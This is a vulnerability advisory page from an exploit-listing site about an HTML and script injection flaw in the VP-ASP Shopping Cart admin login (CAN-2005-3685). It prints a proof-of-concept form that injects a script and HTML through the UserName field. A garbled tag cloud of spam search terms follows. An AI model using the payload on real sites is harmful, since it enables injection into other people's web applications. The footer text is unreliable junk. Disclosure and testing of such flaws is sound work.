about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability


Title VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
Published 2005-11-17-12:00AM
Updated 2005-11-17-10:42PM
Class Input Validation Error
CVE   CAN-2005-3685
Remote  Yes
Local  No
Credit  ConcorDHacK is credited with the discovery of this vulnerability.
Vulnerable  VPASP Shopping Cart
Not Vulnerable  
Code   No exploit is required.

Proof of concept code has been provided:

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 19:24:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
CMS is Fre Powered sex.pcture Rambha nud website mo Apache h kamasutra CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre CMS is Fre Free sex v for www.Se Categories s e k s 359-888-5 WWW.XXX89. t232t Searching mambo remo sexbad +359-888-5 GET /galle Www.Teenag MySQL 4..4 FTP protoc CMS is Fre sexyvidieo system W w w teen ad aware www.pakist iis5 0day s e k s lo215l Simran and sexbangla. cms is fre